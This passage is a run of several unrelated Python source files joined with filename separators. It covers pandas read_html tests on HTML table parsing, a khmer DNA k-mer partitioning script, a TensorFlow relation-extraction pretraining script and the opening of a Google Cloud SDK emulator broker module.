gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
|
do-partition-stop.py | #! /usr/bin/env python2
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2013. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
import khmer
import sys
import threading
import Queue
import gc
import os.path
K = 32
HASHTABLE_SIZE = int(1e9)
N_HT = 4
COUNTING_SIZE = int(1e8)
SUBSET_SIZE = int(1e4)
N_THREADS = 8
ht = None
###
save_ht = False
load_ht = False
save_merged_pmap = True
remove_orig_pmap = True
assert not (save_ht and load_ht) # incompatible
if not save_merged_pmap and remove_orig_pmap:
print '** warning, all the pmap files are going away! no permanent record!'
print ''
###
def worker(q, basename):
while 1:
try:
(ht, n, start, stop) = q.get(False)
except Queue.Empty:
print 'exiting'
return
outfile = basename + '.subset.%d.pmap' % (n,)
if os.path.exists(outfile):
print 'SKIPPING', basename, ' -- already exists'
continue
print 'starting:', basename, n
subset = ht.do_subset_partition(start, stop)
print 'saving:', basename, n
ht.save_subset_partitionmap(subset, outfile)
del subset
gc.collect()
def main(filename):
global ht
basename = os.path.basename(filename)
print 'input file to partition: %s' % filename
print '-- settings:'
print 'K', K
print 'HASHTABLE SIZE %g' % HASHTABLE_SIZE
print 'N HASHTABLES %d' % N_HT
print 'SUBSET SIZE', SUBSET_SIZE
print 'N THREADS', N_THREADS
print '--'
ht = khmer.new_hashbits(K, HASHTABLE_SIZE, N_HT)
# populate the hash table and tag set
if not load_ht:
print 'reading sequences and loading tagset from %s...' % (filename,)
ht.consume_fasta_and_tag(filename)
# save to a file (optional)
if save_ht:
print 'saving...'
ht.save(basename + '.ht')
print 'saving tagset...'
ht.save_tagset(basename + '.tagset')
# calculate the hashtable occupancy
print '---'
print 'hashtable occupancy:', ht.n_occupied() / float(HASHTABLE_SIZE)
print '---'
else:
print 'loading ht %s.ht' % basename
ht.load(basename + '.ht')
print 'loading tagset %s.tagset...' % basename
ht.load_tagset(basename + '.tagset')
###
counting = khmer.new_counting_hash(K, COUNTING_SIZE, N_HT)
ht.traverse_from_tags(counting, 40, 2000, 5)
print 'saving stoptags binary'
ht.save_stop_tags(basename + '.stoptags')
sys.exit(0)
#
x = counting.abundance_distribution(filename)
fp = open(basename + '.tabund', 'w')
for i, n in enumerate(x):
if n:
print >>fp, i, n
fp.close()
print 'converting to stoptags'
ht.hitraverse_to_stoptags(filename, counting, 5)
print 'saving stoptags binary'
ht.save_stop_tags(basename + '.stoptags')
print 'saving stoptags text'
ht.print_stop_tags(basename + '.stoptags.txt')
print 'eliminating counting hash'
del counting
gc.collect()
sys.exit(0)
###
# divide the tags up into subsets
print 'divvying up tags'
divvy = ht.divide_tags_into_subsets(SUBSET_SIZE)
n_subsets = len(divvy)
divvy.append(0)
# build a queue of tasks:
worker_q = Queue.Queue()
for i in range(0, n_subsets):
start = divvy[i]
end = divvy[i + 1]
worker_q.put((ht, i, start, end))
print 'enqueued %d subset tasks' % n_subsets
open('%s.info' % basename, 'w').write('%d subsets total\n' % (n_subsets))
threads = []
for n in range(N_THREADS):
t = threading.Thread(target=worker, args=(worker_q, basename))
threads.append(t)
t.start()
print 'started threads'
# wait for threads
for t in threads:
t.join()
print 'done making subsets! see %s.subset.*.pmap' % (basename,)
###
print 'erasing old ht, creating new'
del ht
gc.collect()
# create a new, empty ht object for merging; K matters, but not
# hashtable size.
ht = khmer.new_hashbits(K, 1, 1)
# load & merge all pmap files
for i in range(0, n_subsets):
pmap_file = basename + '.subset.%d.pmap' % (i,)
print 'loading', pmap_file
ht.merge_subset_from_disk(pmap_file)
# save merged partitionmap
if save_merged_pmap:
print 'saving merged pmap to %s.pmap.merged' % basename
ht.save_partitionmap(basename + '.pmap.merged')
if remove_orig_pmap:
print 'removing subset pmap files'
for i in range(0, n_subsets):
pmap_file = basename + '.subset.%d.pmap' % (i,)
os.unlink(pmap_file)
# output partitions!
n_partitions = ht.output_partitions(filename, basename + '.part')
(n_partitions, n_singletons) = ht.count_partitions()
print 'output partitions:', n_partitions
print 'pmap partitions:', n_partitions
print 'singletons:', n_singletons
if __name__ == '__main__':
main(sys.argv[1])
|
train_ug_pretrain.py | import tensorflow as tf
import numpy as np
import time
import datetime
import os
import network_pretrain as network_pre#pretraining for random division.
import json
from sklearn.metrics import average_precision_score
import sys
import ctypes
import threading
from kg_dataset_transe import KnowledgeGraph
export_path = "../biomedical_part1/"
export_path_g = "../biomedical_part2/"
word_vec = np.load(export_path + 'vec.npy')
KG = KnowledgeGraph(export_path)
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_float('nbatch_kg', 200,'entity numbers used each training time')
tf.app.flags.DEFINE_float('margin',1.0,'entity numbers used each training time')
tf.app.flags.DEFINE_float('learning_rate_kg',0.05,'learning rate for kg')
tf.app.flags.DEFINE_integer('rel_total', 87,'total of relations')
tf.app.flags.DEFINE_integer('katt_flag', 13, 'type of attention')
tf.app.flags.DEFINE_string('model', 'cnn', 'neural models to encode sentences')
tf.app.flags.DEFINE_integer('max_length', 120,'maximum of number of words in one sentence')
tf.app.flags.DEFINE_integer('pos_num', 120 * 2 + 1,'number of position embedding vectors')
tf.app.flags.DEFINE_integer('num_classes', 87,'maximum of relations')
tf.app.flags.DEFINE_integer('hidden_size', 100,'hidden feature size')
#tf.app.flags.DEFINE_integer('hidden_size', 200,'hidden feature size')#for svd.
tf.app.flags.DEFINE_integer('pos_size', 5,'position embedding size')
#tf.app.flags.DEFINE_integer('max_epoch_pre', 50,'maximum of training epochs')
tf.app.flags.DEFINE_integer('max_epoch_pre', 2,'maximum of training epochs')
tf.app.flags.DEFINE_integer('batch_size',50,'entity numbers used each training time')
tf.app.flags.DEFINE_float('learning_rate',0.02,'learning rate for nn')
tf.app.flags.DEFINE_float('weight_decay',0.00001,'weight_decay')
tf.app.flags.DEFINE_float('keep_prob',0.5,'dropout rate')
tf.app.flags.DEFINE_string('model_dir', './model/','path to store model')
tf.app.flags.DEFINE_string('summary_dir','./summary','path to store summary_dir')
def MakeSummary(name, value):
"""Creates a tf.Summary proto with the given name and value."""
summary = tf.Summary()
val = summary.value.add()
val.tag = str(name)
val.simple_value = float(value)
return summary
def make_shape(array,last_dim):
output = []
for i in array:
for j in i:
output.append(j)
output = np.array(output)
if np.shape(output)[-1]==last_dim:
return output
else:
print 'Make Shape Error!'
def main(_):
word_vec = np.load(export_path + 'vec.npy')
instance_triple = np.load(export_path + 'train_instance_triple0.npy')
instance_scope = np.load(export_path + 'train_instance_scope0.npy')
instance_scope_path = np.load(export_path_g + 'train_instance_scope_kg0.npy')
instance_scope_path3 = np.load(export_path_g + 'train_instance_scope_tx0.npy')
instance_scope_path4 = np.load(export_path_g + 'train_instance_scope_ug0.npy')
train_len = np.load(export_path + 'train_len0.npy')
train_label = np.load(export_path + 'train_label0.npy')
train_word = np.load(export_path + 'train_word0.npy')
train_pos1 = np.load(export_path + 'train_pos10.npy')
train_pos2 = np.load(export_path + 'train_pos20.npy')
train_word_cross = np.load(export_path_g + 'train_word_cross0.npy')
train_pos1_cross = np.load(export_path_g + 'train_pos1_cross0.npy')
train_pos2_cross = np.load(export_path_g + 'train_pos2_cross0.npy')
train_word_cross3 = np.load(export_path_g + 'train_word_cross_tx0.npy')
train_pos1_cross3 = np.load(export_path_g + 'train_pos1_cross_tx0.npy')
train_pos2_cross3 = np.load(export_path_g + 'train_pos2_cross_tx0.npy')
train_word_cross4 = np.load(export_path_g + 'train_word_cross_ug0.npy')
train_pos1_cross4 = np.load(export_path_g + 'train_pos1_cross_ug0.npy')
train_pos2_cross4 = np.load(export_path_g + 'train_pos2_cross_ug0.npy')
train_mask = np.load(export_path + 'train_mask0.npy')
train_head = np.load(export_path + 'train_head0.npy')
train_tail = np.load(export_path + 'train_tail0.npy')
reltot = {}
for index, i in enumerate(train_label):
if not i in reltot:
reltot[i] = 1.0
else:
reltot[i] += 1.0
for i in reltot:
reltot[i] = 1/(reltot[i] ** (0.05))
print 'building network...'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
model = network_pre.CNN(is_training = True, word_embeddings = word_vec)
global_step = tf.Variable(0,name='global_step',trainable=False)
global_step_kg = tf.Variable(0,name='global_step_kg',trainable=False)
tf.summary.scalar('learning_rate', FLAGS.learning_rate)
tf.summary.scalar('learning_rate_kg', FLAGS.learning_rate_kg)
optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)
grads_and_vars = optimizer.compute_gradients(model.loss)
train_op = optimizer.apply_gradients(grads_and_vars, global_step = global_step)
optimizer_kg = tf.train.GradientDescentOptimizer(FLAGS.learning_rate_kg)
grads_and_vars_kg = optimizer_kg.compute_gradients(model.loss_kg)
train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step = global_step_kg)
merged_summary = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(FLAGS.summary_dir, sess.graph)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=None)
print 'building finished'
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
def train_kg(coord):
def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
feed_dict = {
model.pos_h: pos_h_batch,
model.pos_t: pos_t_batch,
model.pos_r: pos_r_batch,
model.neg_h: neg_h_batch,
model.neg_t: neg_t_batch,
model.neg_r: neg_r_batch
}
_, step, loss = sess.run(
[train_op_kg, global_step_kg, model.loss_kg], feed_dict)
return loss
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
times_kg = 0
while not coord.should_stop():
#while True:
times_kg += 1
res = 0.0
pos_batch_gen = KG.next_pos_batch(batch_size)
neg_batch_gen = KG.next_neg_batch(batch_size)
for batchi in range(int(FLAGS.nbatch_kg)):
pos_batch = next(pos_batch_gen)
neg_batch = next(neg_batch_gen)
ph = pos_batch[:, 0]
pt = pos_batch[:, 1]
pr = pos_batch[:, 2]
nh = neg_batch[:, 0]
nt = neg_batch[:, 1]
nr = neg_batch[:, 2]
res += train_step_kg(ph, pt, pr, nh, nt, nr)
time_str = datetime.datetime.now().isoformat()
print "batch %d time %s | loss : %f" % (times_kg, time_str, res)
def train_nn(coord):
def train_step(head, tail, word, pos1, pos2, mask, leng, label_index, label, scope, weights,
word_cr, pos1_cr, pos2_cr, scope_path, head_path, tail_path):
feed_dict = {
model.head_index: head,
model.tail_index: tail,
model.head_index_path: head_path,
model.tail_index_path: tail_path,
model.word: word,
model.pos1: pos1,
model.pos2: pos2,
model.word_cross: word_cr,
model.pos1_cross: pos1_cr,
model.pos2_cross: pos2_cr,
model.mask: mask,
model.len : leng,
model.label_index: label_index,
model.label: label,
model.scope: scope,
model.scope_path: scope_path,
model.keep_prob: FLAGS.keep_prob,
model.weights: weights
}
_, step, loss, summary, output, correct_predictions = sess.run([train_op, global_step, model.loss, merged_summary, model.output, model.correct_predictions], feed_dict)
summary_writer.add_summary(summary, step)
return output, loss, correct_predictions
stack_output = []
stack_label = []
stack_ce_loss = []
train_order = range(len(instance_triple))
save_epoch = 2
eval_step = 300
for one_epoch in range(FLAGS.max_epoch_pre):
print('pretrain epoch '+str(one_epoch+1)+' starts!')
np.random.shuffle(train_order)
s1 = 0.0
s2 = 0.0
tot1 = 0.0
tot2 = 1.0
losstot = 0.0
for i in range(int(len(train_order)/float(FLAGS.batch_size))):
input_scope = np.take(instance_scope, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path = np.take(instance_scope_path, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path3 = np.take(instance_scope_path3, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path4 = np.take(instance_scope_path4, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
index = []
scope = [0]
index_path = []
index_path3 = []
index_path4 = []
scope_path = [0]
scope_path3 = [0]
scope_path4 = [0]
label = []
weights = []
train_head_path = []
train_tail_path = []
train_head_path3 = []
train_tail_path3 = []
train_head_path4 = []
train_tail_path4 = []
for num, num_path, num_path3, num_path4 in zip(input_scope, input_scope_path, input_scope_path3, input_scope_path4):
index = index + range(num[0], num[1] + 1)
label.append(train_label[num[0]])
scope.append(scope[len(scope)-1] + num[1] - num[0] + 1)
weights.append(reltot[train_label[num[0]]])
index_path = index_path + range(num_path[0], num_path[1] + 1)
scope_path.append(scope_path[len(scope_path)-1] + num_path[1] - num_path[0] + 1)
index_path3 = index_path3 + range(num_path3[0], num_path3[1] + 1)
scope_path3.append(scope_path3[len(scope_path3)-1] + num_path3[1] - num_path3[0] + 1)
index_path4 = index_path4 + range(num_path4[0], num_path4[1] + 1)
scope_path4.append(scope_path4[len(scope_path4)-1] + num_path4[1] - num_path4[0] + 1)
train_head_path += [train_head[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_tail_path += [train_tail[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_head_path3 += [train_head[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_tail_path3 += [train_tail[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_head_path4 += [train_head[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
train_tail_path4 += [train_tail[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
label_ = np.zeros((FLAGS.batch_size, FLAGS.num_classes))
label_[np.arange(FLAGS.batch_size), label] = 1
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross3[index_path3,:], train_pos1_cross3[index_path3,:], train_pos2_cross3[index_path3,:],
np.array(scope_path3), train_head_path3, train_tail_path3)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross4[index_path4,:], train_pos1_cross4[index_path4,:], train_pos2_cross4[index_path4,:],
np.array(scope_path4), train_head_path4, train_tail_path4)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross[index_path,:], train_pos1_cross[index_path,:], train_pos2_cross[index_path,:],
np.array(scope_path), train_head_path, train_tail_path)
num = 0
s = 0
losstot += loss
for num in correct_predictions:
if label[s] == 0:
tot1 += 1.0
if num:
s1+= 1.0
else:
tot2 += 1.0
if num:
s2 += 1.0
s = s + 1
time_str = datetime.datetime.now().isoformat()
print "pretrain epoch %d step %d time %s | loss : %f, not NA accuracy: %f" % (one_epoch, i, time_str, loss, s2 / tot2)
current_step = tf.train.global_step(sess, global_step)
if (one_epoch + 1) % save_epoch == 0 and (one_epoch + 1) >= FLAGS.max_epoch_pre:
print 'epoch '+str(one_epoch+1)+' has finished'
print 'saving model...'
path = saver.save(sess,FLAGS.model_dir+'pretrain_'+str(FLAGS.max_epoch_pre))
#path = saver.save(sess,FLAGS.model_dir+'pretrain_'+str(one_epoch + 1))
print 'have savde model to '+path
coord.request_stop()
coord = tf.train.Coordinator()
threads = []
threads.append(threading.Thread(target=train_kg, args=(coord,)))
threads.append(threading.Thread(target=train_nn, args=(coord,)))
for t in threads: t.start()
coord.join(threads)
if __name__ == "__main__":
tf.app.run()
|
broker.py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for controlling instances of cloud-testenv-broker processes."""
import errno
import httplib
import json
import os
import os.path
import socket
import subprocess
import threading
import time
import urllib
from googlecloudsdk.api_lib.emulators import util
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import execution_utils
from googlecloudsdk.core import log
from googlecloudsdk.core.util import platforms
import httplib2
class BrokerError(exceptions.ToolException):
"""All errors raised by this module subclass BrokerError."""
pass
class BrokerNotRunningError(BrokerError):
pass
class RequestError(BrokerError):
"""Errors associated with failed HTTP requests subclass RequestError."""
pass
class RequestTimeoutError(RequestError):
pass
class RequestSocketError(RequestError):
"""A socket error. Check the errno field."""
def __init__(self, *args, **kwargs):
super(RequestError, self).__init__(*args)
self.errno = None
def SocketConnResetErrno():
"""The errno value for a socket connection reset error."""
current_os = platforms.OperatingSystem.Current()
if current_os == platforms.OperatingSystem.WINDOWS:
return errno.WSAECONNRESET
return errno.ECONNRESET
def SocketConnRefusedErrno():
"""The errno value for a socket connection refused error."""
current_os = platforms.OperatingSystem.Current()
if current_os == platforms.OperatingSystem.WINDOWS:
return errno.WSAECONNREFUSED
return errno.ECONNREFUSED
def _Await(fn, timeout_secs):
"""Waits up to timeout_secs for fn() to return True."""
deadline = time.time() + timeout_secs
while time.time() < deadline:
if fn():
return True
time.sleep(0.2)
return False
